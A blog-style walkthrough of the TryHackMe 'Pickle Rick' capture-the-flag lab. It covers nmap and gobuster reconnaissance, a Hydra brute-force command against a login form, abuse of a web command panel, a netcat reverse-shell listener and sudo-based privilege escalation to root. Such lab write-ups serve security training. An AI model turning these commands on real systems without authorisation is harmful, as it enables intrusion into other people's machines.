Pickle Rick | THM Challenge #Easy

Hello, fellow hackers!

Today, I’ll walk you through my journey in this easy TryHackMe challenge, which is themed around Rick and Morty. As described in the challenge, our task is to exploit the web server and locate three ingredients (flags) to help Rick return to his human form.

Initial Reconnaissance

After launching the target machine and AttackBox, my first step was to run a basic port scan to familiarize myself with the server.

nmap -T4 -Pn -sV 10.10.107.135

Nmap Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

So, we have SSH and HTTP open. Time to check the webpage!

Exploring the Web Application

The main page greets us with Rick’s message to Morty—he turned himself into a pickle again and needs help finding the three ingredients.

Checking the Source Code

Before diving deeper, I checked the page source and found this hidden comment:

<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->

Nice! We have a username. Now, we need to find a login page.

Directory Enumeration

I used Gobuster to find hidden directories:

gobuster dir -u http://10.10.107.135 -w /path/to/wordlist

Results:

/assets               (301)
/server-status        (403)

Not much… Let’s try again with .php and .html extensions:

gobuster dir -u http://10.10.107.135 -w /path/to/wordlist -x .php,.html

Results:

/login.php            (200)
/portal.php           (302)
/denied.php           (302)

Bingo! We found /login.php.

Bruteforcing Login

Since SQL injection didn’t seem to work, I moved to bruteforce the password using Hydra:

hydra -l R1ckRul3s -P rockyou.txt <TARGET_IP> http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:F=Invalid"

After 1.5 million attempts with no success, I rechecked the basics and discovered a robots.txt file containing a strange string:

Wubbalubbadubdub

Could this be the password? Let’s try it.

Success! I’m in. 🎉

Exploiting the Command Panel

Inside, I found a command execution panel.
I tried ls and found the first ingredient but couldn’t use cat.
Instead, I used less ingredient-1.txt, and it worked. ✅

Next, I checked the home directories and found the second ingredient in Rick’s home folder. ✅

The third ingredient should be in /root, but I didn't have permission to access it.

Privilege Escalation

Running sudo -l revealed:

User www-data may run the following commands on ip-10-10-94-233:
(ALL) NOPASSWD: ALL

That means I have full sudo access!

Getting a Root Shell

I generated a reverse shell payload using RevShells and set up a listener:

nc -nlvp 4444

Then executed:

sudo su -

Now I’m root! 🏴‍☠️

ls /root
cat 3rd.txt

Final flag retrieved! ✅

Conclusion

This challenge was a great mix of recon, enumeration, bruteforcing, and privilege escalation. Key takeaways:
✔ Always check robots.txt
✔ Bruteforcing isn’t always the answer
✔ Always check sudo permissions for privesc

What do you think? Would you have solved it differently? Let me know! 👇